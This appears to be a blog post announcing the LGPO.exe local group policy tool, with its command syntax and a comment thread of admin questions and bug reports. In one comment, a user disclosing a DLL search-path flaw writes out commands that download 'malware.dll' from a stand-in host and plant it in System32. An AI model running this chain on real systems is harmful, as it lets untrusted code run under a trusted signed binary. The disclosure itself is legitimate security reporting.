LGPO.exe is a new command-line utility to automate the management of local group policy. It replaces the no-longer-maintained LocalGPO tool that shipped with the Security Compliance Manager (SCM), and the Apply_LGPO_Delta and ImportRegPol tools.
Features:
- Import settings into local group policy from GPO backups or from individual policy component files, including Registry Policy (registry.pol), security templates, and advanced auditing CSV files.
- Export local policy to a GPO backup.
- Parse a Registry Policy (registry.pol) file to readable "LGPO text" directly to the console or redirected to a file which can edited and imported into local policy.
- Build a new Registry Policy (registry.pol) file from "LGPO text".
- Enable group policy client side extensions for local policy processing.
The zip file attached to this post includes LGPO.exe and full documentation. This is the command line syntax:
LGPO.exe v1.00 - Local Group Policy Object utility
LGPO.exe has four modes:
* Import and apply policy settings;
* Export local policy to a GPO backup;
* Parse a registry.pol file to "LGPO text" format;
* Build a registry.pol file from "LGPO text".
To apply policy settings:
LGPO.exe command [...]
where "command" is one or more of the following (each of which can be repeated):
/g path import settings from one or more GPO backups under "path"
/m path\registry.pol import settings from registry.pol into machine config
/u path\registry.pol import settings from registry.pol into user config
/s path\GptTmpl.inf apply security template
/a[c] path\Audit.csv apply advanced auditing settings; /ac to clear policy first
/t path\lgpo.txt apply registry commands from LGPO text
/e <name>|<guid> enable GP extension for local policy processing; specify a
GUID, or one of these names:
* "zone" for IE zone mapping extension
* "mitigation" for mitigation options, including font blocking
* "audit" for advanced audit policy configuration
/boot reboot after applying policies
/v verbose output
/q quiet output (no headers)
To create a GPO backup from local policy:
LGPO.exe /b path [/n GPO-name]
/b path Create GPO backup in "path"
/n GPO-name Optional GPO display name (use quotes if it contains spaces)
To parse a Registry.pol file to LGPO text (stdout):
LGPO.exe /parse [/q] {/m|/u} path\registry.pol
/m path\registry.pol parse registry.pol as machine config commands
/u path\registry.pol parse registry.pol as user config commands
/q quiet output (no headers)
To build a Registry.pol file from LGPO text:
LGPO.exe /r path\lgpo.txt /w path\registry.pol [/v]
/r path\lgpo.txt Read input from LGPO text file
/w path\registry.pol Write new registry.pol file
(See the documentation for more information and examples.)
[Update: the latest version of LGPO.exe is here.]
Why is there no Support for MLGPO?
[Aaron Margosis] I've never had a need for it, and no one in any of the customer spaces I've worked with has ever asked me to add that.
Hi,
with the deprecated LocalGPO tool you could create the LocalGPO Packs and apply those from the commandline to specific users. i think im talking about the same this as the poster above.
This was really handy in some situations before.
So even if it is not implemented yet is it possible to integrate this in the future to apply registry.pol files or LGPO Texts to specific user accounts only?
Hi,
Thank you for your excellent work. We make heavy use of the mlgpo function as well, it adds a flexibility I cannot find an easy replacement for. Any chance of adding that functionality back in?
[Aaron Margosis] I'll raise the priority. Note also that while LocalGPO is not being maintained, it can still be downloaded with the SCM.
Can you describe in more detail how you use MLGPO and the value it provides? Thanks.
Any chance the LGPO source code will be posted as with the old tools? It makes it way easier for software to be approved for use if the source is available.
[Aaron Margosis] Probably not this time. This one is digitally signed, though.
When applying multiple registry-based commands from an “LGPO text” file using the /t command and then sysprep a W10v1511 getting [0x0f0083] SYSPRP ActionPlatform::LaunchModule: Caught an unhandled exception while trying to load and execute 'ProvPackageSysprepGeneralize' from C:WindowsSystem32ProvSysprep.dll – normally these LGPO text files are about 10 or so files but place it into one file / remove user and only computer settings, same error. Remove the LGPO /t settings and it will sysprep. These are set in a MDT task sequence
[Aaron Margosis] Based on your description, it doesn't sound like the LGPO tool is the cause — more like the policies you're pushing in are causing Sysprep to fail somehow.
Hello I just wanted to weigh in. We too use the MLGPO command from LocalGPO extensively when deploying kiosk and some user computers. It allows to set policies to specific users. This has become a vital component in our environment, if I could use LocalGPO
with windows 10 I would, LocalGPO does a great job of applying machine policies but does not have the ability to restore or set MLPGO policies on Windows 10 Devices.
If LGPO has this functionality I would be a happy camper 🙂
Issues with LocalGPO on Windows 10
I have patched the file so that it may work on windows 10, heres the link
https://social.technet.microsoft.com/Forums/en-US/e98d8ac5-b091-4209-bc0d-02ba020666e0/localgpo-tool-for-windows-81?forum=compliancemanagement
If I run:
cscript "C:Program Files (x86)LocalGPO"LocalGPO.wsf /Restore
I receive:
(1403, 10) WshShell.Run: Unable to wait for process.
If I run:
cscript "C:Program Files (x86)LocalGPO"LocalGPO.wsf /Path:"C:Program Files ……. /MLGPO:kiosk
I receive:
Windows XP and Windows Server 2003 do not support MLGPO!!
I understand LocalGPO was not created for Windows 10 but if MLGPO becomes a part of LGPO that would be very beneficial. Thank You
I'm having an issue with importing audit.csv settings, on Win 7 Enterprise x64.
If I import with "/a" (do not clear existing settings), the new setting appears to be active according to auditpol.exe /get, but the System32GroupPolicyMachinemicrosoftwindows ntauditaudit.csv is not updated, and at the next 'gpupdate' the setting reported by auditpol.exe reverts to the previous value defined in audit.csv.
If I import with "/ac" (clear existing settings), the copy of audit.csv at system32grouppolicymachinemicrosoftwindows ntauditaudit.csv is replaced with the new value and everything appears to work.
Am I doing something wrong here?
[Aaron Margosis] No, that's the best that LGPO.exe can do, at least for now. What appears in the Group Policy editor is not necessarily what's actually in effect. See this Ned Pyle blog post for more information.
The LGPO.exe documentation says this:
/a[c] pathaudit.csv
Apply an Advanced Auditing backup (CSV) file. With /ac, LGPO.exe clears existing Advanced Auditing settings before applying the settings from the CSV file, and copies the file to the local group policy subdirectory so that the settings appear in the local group policy editor.
We use MLGPO to apply policies specific to users and groups of users. It is primarily used on non-domain systems to establish policies for non-admins, both on workstations and terminal servers. It is also a key component of kiosk systems for us as well.
Apologies for the late reply.
Maybe I'm missing something. I don't think this is only limiting the ability to view values in the group policy editor.
After executing lgpo.exe /a , the results of "auditpol.exe /get" reflect the new value, but _only_ until the next gpupdate executes. After gpupdate executes, the system reverts back to the previous setting (which remained defined in audit.csv). Does this imply that lgpo.exe /a is ineffective at permanently adding advanced audit settings?
I'm going to attempt to workaround this in script, by retrieving the current audit.csv, modifying it to merge in the new values I wish to apply, then using lgpo.exe /ac to apply the now-complete audit.csv. That's still more complex than what I had hoped for when I saw this new tool appeared to be able to modify the advanced audit settings.
[Aaron Margosis] Your analysis is correct. With /a, lgpo.exe invokes "auditpol.exe /restore" but as you point out that doesn't touch the local policy store. I had wanted to avoid having to write an audit.csv parser, let alone an audit.csv editor. That may be needed if lgpo.exe is to be a complete solution.
I don't want to sound unappreciative on the audit policy restore. Parsing the CSV myself and applying with LGPO.exe /ac is working like a charm, and it's very nice to have Secedit policy, Registry policy, and Audit policy all in one tool. Thanks much, this tool is looking to be very helpful for me!
[Aaron Margosis] I'm glad it's of help. And I appreciate the helpful feedback.
In using LGPO's "Exporting local policy to a GPO backup" the files Backup.xml and Bkupinfo.xml have "Contoso.test" in all of the domain name references. The local policy that was backed up came from a domain workstation at work. Maybe I don't fully understand how GPO backup (and restore) works, but should these two files be referencing contoso or should the real domain name be stored in those two files?
[Aaron Margosis] The "real domain name" in this case would be the local computer name, which wouldn't be of any interest on any other computer.
Thanks for the quick reply, Aaron. Apologies — I should have stated my whole concern in the first post. I'd like to take this LGPO backup from a test suite and import it into a production suite. How do those references to domain "Contoso.test" resolve when restoring this backup into a different domain? Or, is some kind of manual editing needed to make the LGPO backup suitable for restoring in a different domain? Thanks again.
[Aaron Margosis] From what I've seen, it's not an issue. I pretty much copied what the older LocalGpo tool did in this regard, and I don't remember hearing of any problems with it. If I remember correctly, the way I've seen this work is to create a new GPO in AD, then choose Import Settings and pick the local backup. I don't think the "Contoso" designations matter at that point – I believe the import picks up only the settings.
Hi Aaron,
We basically came across your Tool as our requirements lead us to get around 200+ Workgroup Servers in our DMZs to apply a Set of Settings from Local Group Policies.
So as I understand that right, i will just take a GPO from our Domain, Export it and Import it with LGPO.exe /g Path – so thats straight Forward.
What i miss here (or have i missed it?) is the possibility to reset the Settings to Default – as when i Import an previously exported "empty" GPO, that won't Change anything.
As you can imagine – when I deploy those Settings to a couple of hundred Servers, I do need a way back 😉
Thanks!
[Aaron Margosis] It depends on the settings. On the whole, you should capture a backup before you apply the new settings. Note though that some settings that can be applied through a security template don't show up in backups. Advanced Auditing settings shouldn't be a problem. For the registry.pol settings (Administrative Templates and a few others), you could probably delete the registry.pol files and apply the ones you captured in a backup.
FWIW, I never trusted the "restore OS default" mechanism that the old LocalGPO script implemented, and I opted not to try to implement it in LGPO.exe.
I am still looking for a way to make this work in 2016/Windows 10, I am happy to work with the old vb script to try and get it working, but I would appreciate any suggestions you might have on how to adjust that script so it works properly in the new OS. Thank you.
[Aaron Margosis] I assume you're referring to the not-yet-implemented MLGPO feature.
I don't know whether this is a complete fix, but edit LocalGpo.wsf, find the line that says
If(Left(strOpVer,3) = "6.2") and (strProductType <> "1") then
and in that block, add something like this (NOT TESTED):
If(Left(strOpVer,3) = "10.") then
Keep the assignment the same for this case:
strOS = "Win8"
If you assign it something like "Win10" the rest of the script won't recognize it.
I'd also like to add my request to have MLGPO functionality added. In our organization we'd like to be able to apply specific policies to select users on workstations and kiosks so this functionality is very useful. Thank you.
Is there any ability to remove a setting from Registry.pol (i.e. changing to "Not Configured") using the LGPO text format?
According to the PDF, the "DELETE" action behaves as "Deletes the value (reverting a policy to "Not Configured" – but the behavior I see from trying to remove the value HKLMSoftwareTestNewValue from management is that the "SoftwareTest;**del.NewValue;%01;%04;" directive is added to Registry.pol, so the value is removed from the Registry each time Group Policy is reapplied. That's not equivalent to "Not Configured", that's actually "Managed Removal of Registry Key".
What I'm looking for is an ability to "Un-Do" the management of a registry key value, to have no reference to that key remaining in Registry.pol. Is there a better option than 1) Dump current registry.pol to text 2) Delete the reference in the text export 3) Delete registry.pol 4) import the modified text?
[Aaron Margosis] I think that's probably the best way. LGPO.exe doesn't have the ability to edit the registry.pol file directly.
Consider this another vote for MLGPO support. The GPOPack.wsf from SCM / MDT can copy to MLGPO, but unfortunately does not merge settings, it only overwrites them. Having a single tool that can handle all the forms of Local Group Policy would be great.
Aaron,
We could use LocalGPO.wsf to make "MSS:" settings editable: Cscript LocalGPO.wsf /ConfigSCE. You stated that LogalGPO tool won't be supported any longer. What should we use as a replacement in order to be able to work with "MSS:"?
Thank you.
[Aaron Margosis] We included a replacement in the Win10 baselines in the form of a custom ADMX and ADML file. Install those files in the appropriate locations and then find the settings in your Group Policy editor in Computer Configuration | Administrative Templates | MSS (Legacy).
Hi Aaron,
thank you very much for your good work.
We`re using LGPO.exe quite often for exporting local machine / user policy’s .
After that we deploy/import them on other system.
One question…
Is it possible to empty/clear/reset a local machine/user config ?
So that every local policy is set to “not configured” ?
Thanks in advance
[Obligatory preface] Hi, please forgive me in advance, as I am a very fresh IT intern at an incredibly disorganized (and under-staffed!) non-profit. My main task as of late is configuring many new machines -most of which we don’t have images for- so I’m building these from scratch and implementing all of the necessary configurations. We also are running Server 2003, but are receiving a large influx of Surface tablets (that I cannot image, or basically have fumbled around with third party imaging software for long enough that I gave up due to time constraints) and I’m looking for a utility to streamline part of this process. I have no experience with this utility and its functionality, and my scripting knowledge is similarly limited.
I am looking to simply replicate my Local Group Policy settings via script, and from what I’ve read, this utility should be able to manage that for me very simply. As I’ve mentioned before, I have limited access to the domain, etc, so I’m relying on all of this being done on the local machine’s admin account.
I’ve downloaded the zip file (https://msdnshared.blob.core.windows.net/media/TNBlogsFS/prod.evol.blogs.technet.com/telligent.evolution.components.attachments/01/4062/00/00/03/65/94/81/Windows%2010%20TH2%20Security%20Baseline.zip) and extracted it, I’ve read through the documentation provided, but am experiencing issues (probably a very simple command line error) getting the utility to run on my Win 10 machine. After having several goes at installing the client and running the application, I still receive an error when attempting to run the LGPO.exe command (etc) to export my Group Policy configuration to the specified path.
Is there perhaps a manual for novices like myself trying to take a crack at this utility? Thanks in advance for your help, and I appreciate any response as I know it may be frustrating dealing with a ‘green’ tech.
My apologies, the error I mentioned before states that the LGPO.exe isn’t found/cannot be located.
We are using the LGPO.exe tool to export Local Group Policy settings in Windows 10 (using LGPO.exe /b) and then import the settings on other Windows 10 PCs (using LGPO.exe /g). All of the PCs are standalone PCs and are NOT networked or part of a domain. We have noticed some issues when exporting/importing. All of the issues appear to relate to the audit.csv file. We are using the “Advanced Audit Policy Configuration” so the policy “Audit: Force audit policy subcategory settings (Windows Vista or later) to override audit policy category settings” is enabled.
1 – The LGPO tool attempts to overwrite the audit.csv held on the local machine (in C:\Windows\System32\GroupPolicy\Machine\Microsoft\Windows NT\Audit). However, during testing it was apparent that this sometimes fails despite being run with admin privileges. The LGPO tool does report the failure but it’s easy to miss. If it does fail then your policy settings in [Computer Configuration->Windows Settings->Security Settings->Advanced Audit Policy Configuration] will not be applied. We have found the most reliable work around to this is to manually delete the audit.csv in “C:\Windows\System32\GroupPolicy\Machine\Microsoft\Windows NT\Audit” before performing an LGPO import.
2 – When LGPO perform the export, it does NOT copy the audit.csv file in “C:\Windows\System32\GroupPolicy\Machine\Microsoft\Windows NT\Audit”. Instead, it builds the audit.csv file from all of the local group policy settings defined in the “Advanced Audit Policy Configuration”. This generated audit.csv is then copied to the Audit directory on the target PC when the LGPO import is performed. We have experienced some strange desktop issues once the import is applied on another PC. The issue is not immediately apparent and requires a PC reboot. The main error that we have encountered is : “c:\windows\system32\config\systemprofile\desktop is unavailable”. In addition, the Start Menu is unavailable and other components such as OneDrive appear to fail. Through the process of elimination we have narrowed these errors down to one single line entry in the exported audit.csv file :
,,FileGlobalSacl,,,,
If this line is removed from the exported audit.csv file then we do not encounter any problems. Assuming the export is to the C:\Temp directory, our current work-around is to :
Step 1 – Export the Local Group Policy Settings using : LGPO.exe /b C:\Temp\
Step 2 – Overwrite generated audit.csv file in “C:\Temp\{GUID}\DomainSysvol\GPO\Machine\microsoft\windows nt\Audit\audit.csv” with the audit.csv from “C:\Windows\System32\GroupPolicy\Machine\Microsoft\Windows NT\Audit”.
Step 3 – Import the Local Group Policy settings on another PC using : LGPO.exe /g
Unless configured, the audit.csv copied in Step 2 will not contain the FileGlobalSacl definition.
LGPO doesn’t report any errors when we do an import (using /g). It’s only evident that a problem has occurred on reboot (gpupdate /force doesn’t cause it to fail). Yes we are applying AppLocker rules so I will double check those. It does look like the audit.csv is causing the problem though since replacing the exported audit.csv with the one held on the local machine appears to fix the problem.
Can this executable be redistributed in a commercial product? I didn’t see any license information in the documentation.
the LGPO Utility errors out when you set MaximumPasswordAge=0 If I change it to any other number it works fine. (I also have MinimumPasswordAge=0)
Consider this another vote for MLGPO support, I work in a library and all of our Public workstations are on a completely separate network far away from our Domain server. I use MLGPO on all of these public workstations to limit what the users have access to on these machines.
You forgot to inhibit that LGPO.exe can be run on Windows Vista, Windows 7 and Windows Server 2008 [R2] when KB2533623 is not installed there!
CWE-426 and CWE-427 should really be well-known after 15+ years now!
LGPO.exe loads api-ms-win-core-fibers-l1-1-1.dll, api-ms-win-core-localization-l1-2-1.dll, api-ms-win-appmodel-runtime-l1-1-1.dll and ext-ms-win-kernel32-package-current-l1-1-0.dll
These files don’t exist on Windows 7 and earlier.
Take a look at recent MSRC bulletins: this vulnerability was fixed in some Windows components (and still needs to be fixed in quite some more)
Please eat your own dogfood!
Call one of the new Win32 APIs introduced with KB2533623, for example (really: best) SetDefaultDllDirectories(LOAD_LIBRARY_SEARCH_SYSTEM32)
This removes the “application directory” from the DLL search path.
DEFENSE IN DEPTH — the !Microsoft way
Under the user account created during Windows setup run the following command lines from Start->Run:
BITSAdmin.exe /Transfer foobar http://example.com/malware.dll “%TEMP%\ext-ms-win-kernel32-package-current-l1-1-0.dll”
MakeCAB.exe “%TEMP%\ext-ms-win-kernel32-package-current-l1-1-0.dll” “%TEMP%\foobar.cab”
WUSA.exe “%TEMP%\foobar.cab” /Extract:”%SystemRoot%\System32″
LGPO.exe is digitally signed with a Microsoft certificate, tampering with the binary invalidates it signature.
The unmodified, signed and trusted binary but loads and executes untrusted code when run from an untrusted location.
Default installations of Windows allow users to write to System32, WITHOUT triggering an UAC prompt!
Is this “game over” enough?
If you start LGPO.exe under Windows 7 (this is the Windows version with the biggest market share) from a trusted directory it will load api-ms-win-core-fibers-l1-1-1.dll, api-ms-win-core-localization-l1-2-1.dll, api-ms-win-appmodel-runtime-l1-1-1.dll and ext-ms-win-kernel32-package-current-l1-1-0.dll from the PATH
GET A CLUE!
LGPO.exe SHOULD write a warning to stderr when it creates text output files which can’t restore the registry.pol completely, but write
;;; —- Commented out because “LGPO.exe /t” cannot process this command
to stdout.
OTOH processing/implementing of REG_QWORD for export and import should be possible: SAFER rules need this, for example.
JFTR: why did you “invent” your own format for the LGPO text files? The well-known format of registry entries in .INF files is a single line and should be easier to parse/implement!
I hadn’t implemented QWORD because I hadn’t come across an actual need and no one had asked for it. Are you actually implementing SAFER rules? I haven’t seen anyone use those in well over a decade.
I created a new format because .inf syntax was insufficient to replicate the full set of commands that can be represented in a registry.pol file, including creating a key without values, deleting a value, and deleting all values in a key.
| Are you actually implementing SAFER rules?
Of course, since more than 12 years, on all versions and editions of Windows.
| I haven’t seen anyone use those in well over a decade.
Better look at the bright side of life.-P
| I created a new format because .inf syntax was insufficient to replicate the full set of commands that can be represented in a registry.pol file, including creating a key without values,
That’s FLG_REG_KEYONLY, 0x10
| deleting a value,
That’s FLG_ADDREG_DELVAL, 0x4
| and deleting all values in a key.
Please dare to extend the existing format as necessary: you can always introduce new flags.
My proposal is to reuse the existing and well-known “AddReg” syntax:
,[],[],[,]
ARGH!
The blog software sucks, it eats < and >
| ,[],[],[,]
hive,[key, name],[value name],flag|type[,value data]
I too am using Software Restriction Policies (Safer) and am having trouble with LGPO’s lack of qword functionality. By failing to import the “LastModified” qword value, but still importing the remaining Software Restriction Policies, I end up with machines that not only fail SRP, but also cannot produce Group Policy Results from either the GPMC wizard or gpresult /h. Instead I get a message “object reference not set to an instance of an object”
Sorry for the late reply, I think I missed a notification on your comment.
What Software Restriction Policies gets me, is actually very little. A percentage point on a CIS benchmark score and a security auditor who chastises me (a little) less.
SRP is also available on Professional editions, where AppLocker requires Enterprise or Ultimate, but we are going third-party for whitelisting.
I’ve since stopped trying to apply SRP policies with LGPO, but it’s been handling all my other (non-QWORD) tasks fine. I see there’s a LGPO 2.0 prerelease, I look forward to checking it out soon. Thanks for the great work and support!
Can LGPO reset local policy, or be given a set of policy to _remove_?
I’m trying to implement SAFER rules, and need a way to add/remove them on-demand.
Yes, we’re actually using them, unless there’s a better way to block executables in %AppData%. As an MSP, our app lists are too large and varied to reasonably implement an Applocker whitelist.
SAFER reads its rules and settings only from the registry, not from the registry.pol file.
The registry.pol is maintained via secpol.msc and local security policies or group policies only, policies defined there will periodically be (re)written to the registry
If you don’t use secpol.msc or GPO you can modify the registry on demand.
This is… EXACTLY what I was looking for a long time now.
It’s a good thing that you replaced that messed up LocalGPO with all those scripts and unnecessary additions, with this neat and straight forward tool that does it all.
Thanks in advance. I really appreciate it!
I currently use LocalGPo.wsf to create GPOPacks for use in MDT 2013. Having just found out that LocalGPO.wsf is deprecated and this tools is its replacement, can you explain how to create a GPOPack for use with MDT please.
Can this handle policies with group policy registry preferences? I don’t see any syntax to apply a registry.xml as created by a preference.
Truly appreciate all the hard work on this!
Ignore the trolls, and I vote to delete ALL posts by that dude.
Lastly, PLEASE add support for MLGPO. I use it every week.
Hi Aaron,
I have seen that LGPO adjusts settings of my hardening template when configuring user rights.
Is there a way to force the application of settings ?
And, have you a list of settings which can be adjusted by LGPO ? Only user rights or are there other settings?
Thanks
Regards
Greg
Anyone manage to get this to apply an export successfully during an MDT task sequence? I’m trying to apply an export to Windows 10 RS1 via MDT 2013 Update 2. Create an application with source files, working directory is the application directory, with an installation batch file that just calls .\LGPO.exe /g .\. Always works when I run it manually, but when I run it from MDT I always get errors like this:
Z:\Applications\LGPO>LGPO.exe /g .\
LGPO.exe v1.00 – Local Group Policy Object utility
Audit policy directory exists
Copied .\{7CAC6114-22D3-4914-A3D6-8B9AB789C7D7}\DomainSysvol\GPO\Machine\microsoft\windows nt\Audit\audit.csv
to C:\windows\system32\GroupPolicy\Machine\Microsoft\Windows NT\Audit\audit.csv
Clearing existing audit policy
Apply Audit policy from .\{7CAC6114-22D3-4914-A3D6-8B9AB789C7D7}\DomainSysvol\GPO\Machine\microsoft\windows nt\Audit\audit.csv
Apply security template: .\{7CAC6114-22D3-4914-A3D6-8B9AB789C7D7}\DomainSysvol\GPO\Machine\microsoft\windows nt\SecEdit\GptTmpl.inf
Configuring the current system with this template in the /overwrite mode will result in losing the existing security records in the database specified.Do you want to continue this operation ? [y/n]
The system cannot find the file specified.
The task has completed with an error.
See log C:\Users\ADMINI~1\AppData\Local\Temp\GPT3E9D.tmp for detail info.
[[[ Security template log file output follows: C:\Users\ADMINI~1\AppData\Local\Temp\GPT3E9D.tmp ]]]
——————————————-
Wednesday, August 10, 2016 8:53:00 AM
Warning 2: The system cannot find the file specified.
Error opening Z:\Applications\LGPO\{7CAC6114-22D3-4914-A3D6-8B9AB789C7D7}\DomainSysvol\GPO\Machine\microsoft\windows nt\SecEdit\GptTmpl.inf.
Warning 6: The handle is invalid.
—-Configuration engine was initialized with one or more errors.—-
Any ideas?
I’m sure there are other ways, but my solution to get this working in MDT was to create and application with the exported GPO as the source files and include and installation batch file with it. The Quiet Install command for the application is install.cmd and the working directory is the application directory. The batch file copies the content locally, executes LGPO from there, and the cleans up. For some reason this worked but it always errored when running from the Application Directory.
Batch file code:
REM Create temp dir for source files
md %temp%\LGPO_Inst
REM copy files to local temp dir for execution
xcopy *.* %temp%\LGPO_Inst /E /H /C /I /Q /Y
REM switch to local temp dir for execution
cd /d %temp%\LGPO_Inst
REM Apply Local GPO
LGPO.exe /g .\
cd ..
REM Cleanup
rd %temp%\LGPO_Inst /s /q
I have the same Problem by using LGPO tool. I always get “Configuring the current system with this template in the /overwrite mode will result in losing the existing security records in the database specified.Do you want to continue this operation ? [y/n]”. What is the correct soloution? I don’t use MDT.
Is there a way to enable the MSS hidden entries with this tool? The option for LocalGPO was /ConfigSCE. My GPO backup has some of these entries set but they do not show on my Windows 10 testing. Thanks.
I know I’m late, but regarding MLGPO, I found this folder to be very interesting: %WinDir%\System32\GroupPolicyUsers
Here we have sid folders for user(s) who have their own gpo.
To get sid: wmic useraccount get name,sid
Aaron,
Thank you for creating this tool. I am using it to create hardened baseline security configurations on standalone systems and I am exporting those security baselines to other standalone workstations. I have run into an issue though, when I export the LGPO policy, the GptTmpl “inf” file [file security] SACL are missing. I have to turn on auditing on several files and folders and I can’t seem to export the INF file template with the [File Security] settings.
Am I missing something, or does this exe write to stderr instead of stdout?
Entering the following in a cmd window:
LGPO.exe 1>out.txt 2>err.txt
writes all the output to err.txt instead of out.txt.
This is the same for other calls to to LGPO.exe, e.g. using /g
Hi, is this tool can help me to import export group policy that I took from Active directory to local group policy in windows 7/10??
I am having trouble using LGPO v1.00 to backup the policies on a Windows 10 machine. I get error 0x0000000D occurred:
c:\program files\lgpo\lgpo.exe /b c:\GpoBackups
LGPO.exe v1.00 – Local Group Policy Object utility
Creating LGPO backup in “c:\gpobackups\{…..}”
Executing command:
c:\windows\system32\auditpol.exe /backup
/file:”c:gpobackups\{…..]\domainSysvol\GPO\Machine\microsoft\windows nt\audit\audit.csv”
Error 0x0000000D occurred:
The data is invalid.
External process exited with exit code 13
_________________________________________________________________________________________________
Any thoughts for me to try to get this to work????
It is on an English system and I have tried and I have tried with Version 2 and get the same error. This is on a Windows 7 system that was upgraded to Windows 10 in place.
reg.exe query hklm\system\currentcontrolset\control\lsa
Here you go sir.
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
auditbasedirectories reg_dword 0x0
auditbaseobjects reg_dword 0x0
bounds reg_binary 0030000000200000
limitblankpassworduse reg_sword 0x1
nolmhash reg_dwors 0x1
notification packages reg_multi_sz scecli
authentication packages reg_multi_sz msv1_0
crashonauditfail reg_dword 0x0
disabledomaincreds reg_dword 0x0
everyoneincludesanonymous reg_dword 0x0
forceguest reg_dword 0x0
fullprivilegeauditing reg_binary 3000
lmcompatibilitylevel reg_dword 0x1
lsapid reg_dword 0x29c
producttype reg_dword 0x4
restrictanonymous reg_dword 0x1
restrictanonymoussam reg_dword 0x1
scenoapplylegacyauditpolicy reg_dword 0x1
secureboot reg_dword 0x1
security packages reg_multi_sz kerberous\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa\accessproviders
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa\audit
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa\centralizedaccesspolicies
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa\credssp
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa\data
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa\fipsalgorithmpolicy
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa\gbg
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa\jd
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa\kerberos
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa\msv1_0
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa\osconfig
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa\skew1
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa\sso
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa\sspicache
It appears to be fullprivilegeauditing. If I set that to 00 instead of 3000, LGPO completes the backup without error.
It seems to be that way on all of you workstations. What is it for? Is it something that has been improperly set in a group policy?
Aaron,
Just a suggestion, but with the pre-release of 2.0 maybe put a link to that in the header summary for easy finding? Especially if you want to start deprecating the 1.0 version.
Cheers,
Mark
Hi. great work. When I import GPO policies to a new computer (with LGPO.exe /g path), GPO apply correctly (And appear in gpedit.msc), but in regedit I can not find the key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects
Where is the new GPO security template imported into regedit? thanks
Hi Aaron,
Would the lgpo tool be able to process local GPO preferences with the /e option? I’ve created a gpo with a preference that sets a reg key, but I can’t get it to work. Could be me. Hope you can help me out in understanding.
It would be great if there was a backup option that went straight to an LGPO text file. My use case is just backing up registry-based LGPO stuff, and I want a nice diffable format. Right now I have to backup to a folder and then parse the .pol files and merge to get a single LGPO text. The LGPO text can be imported, so it would be great to be able to output it as well.
I may have encountered an obscure bug.
I had instances where `lgpo.exe /t path\lgpo.txt` appeared to not import machine-level settings on a few hosts, and eventually found it was updating \windows\syswow64\grouppolicy\machine\registry.pol rather than \windows\system32\grouppolicy\machine\registry.pol.
I don’t know how the syswow64 version of registry.pol was created (on only a few machines in my environment), but I’ve found it to be reproducible that if I copy system32\GroupPolicy to syswow64\GroupPolicy, that subsequent runs of lgpo.exe will begin updating the syswow64 version rather than the system32 version of registry.pol.
I will attempt to workaround by finding and removing syswow64\GroupPolicy\Machine and syswow64\GroupPolicy\User. Are there any cases where a syswow64 copy of the GroupPolicy folder should be kept rather than removed?
Thanks again Aaron for the great tool, it continues to be useful for me daily!
Another quick test – if the Windows\SysWOW64\GroupPolicy\Machine folder is present, lgpo.exe /t file.inf will create a new registry.pol file in the syswow64 path. So I don’t need an existing registry.pol file, just the existence of a SysWOW64\GroupPolicy\Machine folder is enough to trigger this issue for me.
Hi!
Thanks for the great work!
But…
How do I export MLGPOs on a Win10Enterprise Machine and how do I import them, or create an GPOPack (which are the compatible files, which need to be included in the export directory… GPOPack.wsf/LocalPol.exe/LocalSecurityDB.sdb?)?
I would highly appreciate an answer to solve this week-lasting problem. 🙂
Oh, and you need LGPO v2 for this. https://blogs.technet.microsoft.com/secguide/2016/09/23/lgpo-exe-v2-0-pre-release-support-for-mlgpo-and-reg_qword/
Hi, I’m trying to disable Windows 10’s Cortana using the text policy file below.
Computer
SOFTWARE\Policies\Microsoft\Windows\Windows Search
AllowCortana
DWORD:0
The command that I’m using is lgpo.exe /t cortana.txt /v
The Result is this:
Apply registry-based settings from LGPO text file: cortana.txt
PROCESSING INPUT FILE FOR REGISTRY-BASED POLICY: cortana.txt
Computer Config SOFTWARE\Policies\Microsoft\Windows\Windows Search AllowCortana REG_DWORD 0
The problem is that the policy never seems to actually get applied if I check the registry or using gpedit.
Am I missing something?
Thanks
Hi Aaron, I’m just getting back into trying to configure policies again. I looked into Domain policies but I don’t think that’s the case. I’m rolling out Win 10 Enterprise x64 1703 and LGPO policies just don’t take effect. We have 2 domains. I tried our new one, our old one, I tried different OUs, and I tried totally taking the client machine out of the domain, nothing works. The weird thing is that I have another Win 10 machine that’s part of our old domain. That one was setup manually and is build 1607. Any idea what could be going on? The group policy operational log reports error event 7016 when I run the command.
I didn’t complete my statement above, the machine that was rolled out “manually” does apply my Cortana policy successfully using LGPO.EXE.
I have installed the Windows-10-RS1 and Server 2016-Baselines which use LGPO for their installation. When I install the Member server, I see the custom templates referenced in the article (eg. MS Security Guide) when I run Gpedit.msc. When I do the same thing on a W10 1607 LTSB system, I see nothing in GPEdit. The strange part is that the settings are actually there. Specifically the “Apply UAC restrictions to local accounts on network logons” is enabled if I check the registry. Also if I change the registry to zero and then reboot, it is set back to 1. Am I missing something or do Custom Templates just not show in the client GP Editor? If not how to I change the policies or use the other legacy policies that have been added? Thanks
I’m struggling with this.
I have 10-12 settings I want to deploy to a machine. Prior to importing I take a backup which has no configured settings. I then import my settings from a folder and I can see that they are present using GPedit. Now, if I want to remove these settings I feel that I should simply be able to restore or import the previous backup but I’m seeing that, If I perform the restore I see no change. I’ve run “gpupdate /target:computer /force” and I’ve even rebooted but the settings remain. What am I missing?
